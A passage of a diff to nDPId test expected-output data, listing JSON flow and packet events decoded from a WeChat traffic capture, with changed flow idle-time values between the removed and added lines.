{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1492167697384,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167697384,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
00702{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1113,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167338426,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167713329,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167730051,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720353,"flow_last_seen":1492167720353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167720353,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"} 
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 